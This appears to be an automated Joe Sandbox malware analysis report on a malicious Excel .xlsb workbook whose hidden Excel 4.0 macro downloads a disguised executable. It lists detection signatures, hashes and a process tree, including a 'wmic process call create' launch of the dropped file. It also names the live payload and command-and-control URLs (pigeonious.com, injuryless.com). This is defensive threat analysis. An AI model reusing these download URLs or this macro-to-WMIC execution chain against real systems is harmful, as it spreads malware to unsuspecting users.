Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report Current-Status-062021-81197.xlsb

Overview

General Information

Sample Name:Current-Status-062021-81197.xlsb
Analysis ID:432839
MD5:1ac719c744d22f42e4978e7b55828435
SHA1:4ddc7358f615987bf92ed9192430693db65b097c
SHA256:d9be275feff4b3383821b1483ba93424fb27aa40e138da41a91511193d9538cb
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Document exploit detected (drops PE files)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Contains functionality to create processes via WMI
Creates processes via WMI
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Drops PE files to the user root directory
Found abnormal large hidden Excel 4.0 Macro sheet
Machine Learning detection for dropped file
Office process drops PE file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Abnormal high CPU Usage
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapater information
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Extensive use of GetProcAddress (often used to hide API calls)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Sample execution stops while process was sleeping (likely an evasion)
Uses code obfuscation techniques (call, push, ret)
Yara detected Xls With Macro 4.0

Classification

Process Tree

  • System is w10x64
  • EXCEL.EXE (PID: 7076 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • WMIC.exe (PID: 2460 cmdline: wmic process call create 'C:/Users/Public/SettingSyncHost' MD5: 79A01FCD1C8166C5642F37D1E0FB7BA8)
      • conhost.exe (PID: 352 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • SettingSyncHost (PID: 1808 cmdline: C:/Users/Public/SettingSyncHost MD5: 526D56017EF5105277FE0D366C95C39D)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
app.xmlJoeSecurity_XlsWithMacro4Yara detected Xls With Macro 4.0Joe Security

    Sigma Overview

    System Summary:

    barindex
    Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
    Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: wmic process call create 'C:/Users/Public/SettingSyncHost', CommandLine: wmic process call create 'C:/Users/Public/SettingSyncHost', CommandLine|base64offset|contains: h, Image: C:\Windows\SysWOW64\wbem\WMIC.exe, NewProcessName: C:\Windows\SysWOW64\wbem\WMIC.exe, OriginalFileName: C:\Windows\SysWOW64\wbem\WMIC.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 7076, ProcessCommandLine: wmic process call create 'C:/Users/Public/SettingSyncHost', ProcessId: 2460

    Signature Overview

    Click to jump to signature section

    Show All Signature Results

    AV Detection:

    barindex
    Multi AV Scanner detection for domain / URLShow sources
    Source: injuryless.comVirustotal: Detection: 7%Perma Link
    Multi AV Scanner detection for dropped fileShow sources
    Source: C:\Users\Public\SettingSyncHostReversingLabs: Detection: 17%
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\logo[1].pngReversingLabs: Detection: 17%
    Multi AV Scanner detection for submitted fileShow sources
    Source: Current-Status-062021-81197.xlsbVirustotal: Detection: 8%Perma Link
    Machine Learning detection for dropped fileShow sources
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\logo[1].pngJoe Sandbox ML: detected
    Source: C:\Users\Public\SettingSyncHostJoe Sandbox ML: detected
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
    Source: unknownHTTPS traffic detected: 95.142.44.93:443 -> 192.168.2.4:49734 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 193.178.169.243:443 -> 192.168.2.4:49739 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 193.178.169.243:443 -> 192.168.2.4:49739 version: TLS 1.2
    Source: Binary string: C:\Work\Downloader\Downloader\Release\Downloader.pdb source: SettingSyncHost
    Source: Binary string: C:\Work\Downloader\Downloader\Release\Downloader.pdb5 source: SettingSyncHost, 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp
    Source: C:\Users\Public\SettingSyncHostCode function: 5_2_003CCEB0 FindFirstFileA,FindNextFileA,FindNextFileA,FindNextFileA,FindNextFileA,FindClose,5_2_003CCEB0
    Source: C:\Users\Public\SettingSyncHostCode function: 5_2_003EA7D5 FindFirstFileExW,5_2_003EA7D5

    Software Vulnerabilities:

    barindex
    Document exploit detected (drops PE files)Show sources
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: logo[1].png.0.drJump to dropped file
    Document exploit detected (UrlDownloadToFile)Show sources
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXESection loaded: unknown origin: URLDownloadToFileAJump to behavior
    Document exploit detected (process start blacklist hit)Show sources
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe
    Source: global trafficDNS query: name: pigeonious.com
    Source: global trafficTCP traffic: 192.168.2.4:49734 -> 95.142.44.93:443
    Source: global trafficTCP traffic: 192.168.2.4:49734 -> 95.142.44.93:443
    Source: Joe Sandbox ViewASN Name: VDSINA-ASRU VDSINA-ASRU
    Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
    Source: C:\Users\Public\SettingSyncHostCode function: 5_2_003D7CF0 InternetReadFile,5_2_003D7CF0
    Source: unknownDNS traffic detected: queries for: pigeonious.com
    Source: SettingSyncHost, 00000005.00000002.1526548221.0000000000D83000.00000004.00000020.sdmpString found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c0
    Source: SettingSyncHost, 00000005.00000002.1526548221.0000000000D83000.00000004.00000020.sdmpString found in binary or memory: http://cps.letsencrypt.org0
    Source: SettingSyncHost, 00000005.00000002.1526548221.0000000000D83000.00000004.00000020.sdmpString found in binary or memory: http://cps.root-x1.letsencrypt.org0
    Source: SettingSyncHost, 00000005.00000002.1526548221.0000000000D83000.00000004.00000020.sdmpString found in binary or memory: http://crl.identrust.com/DSTROOTCAX3CRL.crl0
    Source: 091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
    Source: SettingSyncHost, 00000005.00000002.1526548221.0000000000D83000.00000004.00000020.sdmpString found in binary or memory: http://r3.i.lencr.org/0
    Source: SettingSyncHost, 00000005.00000002.1526548221.0000000000D83000.00000004.00000020.sdmpString found in binary or memory: http://r3.o.lencr.org0
    Source: 091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
    Source: SettingSyncHost, 00000005.00000002.1526548221.0000000000D83000.00000004.00000020.sdmpString found in binary or memory: http://x1.c.lencr.org/0
    Source: SettingSyncHost, 00000005.00000002.1526548221.0000000000D83000.00000004.00000020.sdmpString found in binary or memory: http://x1.i.lencr.org/0
    Source: 091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/download
    Source: 091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
    Source: 091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drString found in binary or memory: https://addinslicensing.store.office.com/commerce/query
    Source: 091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
    Source: 091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: 091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drString found in binary or memory: https://api.aadrm.com/
    Source: 091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
    Source: 091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
    Source: 091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drString found in binary or memory: https://api.addins.store.office.com/app/query
    Source: 091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drString found in binary or memory: https://api.cortana.ai
    Source: 091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drString found in binary or memory: https://api.diagnostics.office.com
    Source: 091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
    Source: 091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drString found in binary or memory: https://api.microsoftstream.com/api/
    Source: 091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drString found in binary or memory: https://api.office.net
    Source: 091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drString found in binary or memory: https://api.onedrive.com
    Source: 091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
    Source: 091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
    Source: 091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
    Source: 091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drString found in binary or memory: https://apis.live.net/v5.0/
    Source: 091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
    Source: 091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
    Source: 091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drString found in binary or memory: https://augloop.office.com
    Source: 091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drString found in binary or memory: https://augloop.office.com/v2
    Source: 091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
    Source: 091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
    Source: 091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drString found in binary or memory: https://cdn.entity.
    Source: 091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
    Source: 091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
    Source: 091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
    Source: 091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
    Source: 091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drString found in binary or memory: https://clients.config.office.net/
    Source: 091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
    Source: 091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
    Source: 091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
    Source: 091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
    Source: 091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
    Source: 091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drString found in binary or memory: https://config.edge.skype.com
    Source: 091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
    Source: 091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
    Source: 091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drString found in binary or memory: https://cortana.ai
    Source: 091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drString found in binary or memory: https://cortana.ai/api
    Source: 091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drString found in binary or memory: https://cr.office.com
    Source: 091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drString found in binary or memory: https://dataservice.o365filtering.com
    Source: 091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drString found in binary or memory: https://dataservice.o365filtering.com/
    Source: 091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
    Source: 091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
    Source: 091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
    Source: 091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drString found in binary or memory: https://dev.cortana.ai
    Source: 091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
    Source: 091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
    Source: 091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drString found in binary or memory: https://devnull.onenote.com
    Source: 091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drString found in binary or memory: https://directory.services.
    Source: 091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
    Source: 091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
    Source: 091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
    Source: 091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: 091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
    Source: 091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
    Source: 091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drString found in binary or memory: https://graph.ppe.windows.net
    Source: 091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drString found in binary or memory: https://graph.ppe.windows.net/
    Source: 091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drString found in binary or memory: https://graph.windows.net
    Source: 091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drString found in binary or memory: https://graph.windows.net/
    Source: 091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
    Source: 091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
    Source: 091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
    Source: 091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
    Source: 091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
    Source: 091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
    Source: 091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
    Source: 091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drString found in binary or memory: https://incidents.diagnostics.office.com
    Source: 091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
    Source: SettingSyncHost, 00000005.00000002.1526548221.0000000000D83000.00000004.00000020.sdmpString found in binary or memory: https://injuryless.com/
    Source: SettingSyncHost, 00000005.00000002.1526548221.0000000000D83000.00000004.00000020.sdmpString found in binary or memory: https://injuryless.com/.7.3.11.3.6.1.5.5.7.3.22.23.140.1.2.11.3.6.1.4.1.44947.1.1.11.3.6.1.5.5.7.3.
    Source: SettingSyncHost, 00000005.00000002.1526548221.0000000000D83000.00000004.00000020.sdmpString found in binary or memory: https://injuryless.com/11.10.3.41.3.6.1.4.1.311.10.3.12
    Source: SettingSyncHost, 00000005.00000002.1526548221.0000000000D83000.00000004.00000020.sdmp, SettingSyncHost, 00000005.00000002.1526534901.0000000000D68000.00000004.00000020.sdmpString found in binary or memory: https://injuryless.com/?id=124406_ECF4BBEA1588
    Source: SettingSyncHost, 00000005.00000002.1526534901.0000000000D68000.00000004.00000020.sdmpString found in binary or memory: https://injuryless.com/?id=124406_ECF4BBEA1588.
    Source: SettingSyncHost, 00000005.00000002.1526548221.0000000000D83000.00000004.00000020.sdmpString found in binary or memory: https://injuryless.com/?id=124406_ECF4BBEA1588/3
    Source: SettingSyncHost, 00000005.00000002.1526534901.0000000000D68000.00000004.00000020.sdmpString found in binary or memory: https://injuryless.com/?id=124406_ECF4BBEA15881
    Source: SettingSyncHost, 00000005.00000002.1526534901.0000000000D68000.00000004.00000020.sdmpString found in binary or memory: https://injuryless.com/?id=124406_ECF4BBEA15887
    Source: SettingSyncHost, 00000005.00000002.1526548221.0000000000D83000.00000004.00000020.sdmpString found in binary or memory: https://injuryless.com/?id=124406_ECF4BBEA1588G
    Source: SettingSyncHost, 00000005.00000002.1526548221.0000000000D83000.00000004.00000020.sdmpString found in binary or memory: https://injuryless.com/?id=124406_ECF4BBEA1588I3
    Source: SettingSyncHost, 00000005.00000002.1526534901.0000000000D68000.00000004.00000020.sdmpString found in binary or memory: https://injuryless.com/?id=124406_ECF4BBEA1588Z
    Source: SettingSyncHost, 00000005.00000002.1526548221.0000000000D83000.00000004.00000020.sdmpString found in binary or memory: https://injuryless.com/?id=124406_ECF4BBEA1588id=124406_ECF4BBEA1588
    Source: SettingSyncHost, 00000005.00000002.1526534901.0000000000D68000.00000004.00000020.sdmpString found in binary or memory: https://injuryless.com/?id=124406_ECF4BBEA1588m
    Source: SettingSyncHost, 00000005.00000002.1526548221.0000000000D83000.00000004.00000020.sdmpString found in binary or memory: https://injuryless.com/?id=124406_ECF4BBEA1588m2
    Source: SettingSyncHost, 00000005.00000002.1526548221.0000000000D83000.00000004.00000020.sdmpString found in binary or memory: https://injuryless.com/?id=124406_ECF4BBEA1588z2
    Source: SettingSyncHost, 00000005.00000002.1526548221.0000000000D83000.00000004.00000020.sdmpString found in binary or memory: https://injuryless.com/X
    Source: SettingSyncHost, 00000005.00000002.1526548221.0000000000D83000.00000004.00000020.sdmpString found in binary or memory: https://injuryless.com/icies
    Source: SettingSyncHost, 00000005.00000002.1526534901.0000000000D68000.00000004.00000020.sdmpString found in binary or memory: https://injuryless.com/id=124406_ECF4BBEA1588
    Source: SettingSyncHost, 00000005.00000002.1526534901.0000000000D68000.00000004.00000020.sdmpString found in binary or memory: https://injuryless.com/id=124406_ECF4BBEA1588p
    Source: SettingSyncHost, 00000005.00000002.1526548221.0000000000D83000.00000004.00000020.sdmpString found in binary or memory: https://injuryless.com/rosoft
    Source: 091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
    Source: 091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
    Source: 091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
    Source: 091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
    Source: 091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
    Source: 091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
    Source: 091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
    Source: 091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
    Source: 091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drString found in binary or memory: https://lifecycle.office.com
    Source: 091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drString found in binary or memory: https://login.microsoftonline.com/
    Source: 091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
    Source: 091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drString found in binary or memory: https://login.windows.local
    Source: 091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
    Source: 091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
    Source: 091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
    Source: 091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
    Source: 091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drString found in binary or memory: https://management.azure.com
    Source: 091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drString found in binary or memory: https://management.azure.com/
    Source: 091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drString found in binary or memory: https://messaging.office.com/
    Source: 091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
    Source: 091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: 091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drString found in binary or memory: https://ncus.contentsync.
    Source: 091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drString found in binary or memory: https://ncus.pagecontentsync.
    Source: 091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
    Source: 091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
    Source: 091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
    Source: 091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
    Source: 091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
    Source: 091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drString found in binary or memory: https://officeapps.live.com
    Source: 091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
    Source: 091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
    Source: 091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
    Source: 091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
    Source: 091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
    Source: 091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
    Source: 091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drString found in binary or memory: https://onedrive.live.com
    Source: 091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
    Source: 091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drString found in binary or memory: https://onedrive.live.com/embed?
    Source: 091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drString found in binary or memory: https://outlook.office.com/
    Source: 091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
    Source: 091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drString found in binary or memory: https://outlook.office365.com/
    Source: 091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
    Source: 091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
    Source: 091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
    Source: 091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drString found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
    Source: 091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drString found in binary or memory: https://pages.store.office.com/review/query
    Source: 091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drString found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
    Source: 091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
    Source: 091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
    Source: 091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
    Source: hats.xmlString found in binary or memory: https://pigeonious.com/img/logo.png
    Source: 091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
    Source: 091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
    Source: 091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
    Source: 091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drString found in binary or memory: https://powerlift.acompli.net
    Source: 091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
    Source: 091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
    Source: 091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
    Source: 091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
    Source: 091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
    Source: 091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drString found in binary or memory: https://settings.outlook.com
    Source: 091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drString found in binary or memory: https://shell.suite.office.com:1443
    Source: 091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drString found in binary or memory: https://skyapi.live.net/Activity/
    Source: 091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
    Source: 091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drString found in binary or memory: https://staging.cortana.ai
    Source: 091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
    Source: 091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drString found in binary or memory: https://store.office.cn/addinstemplate
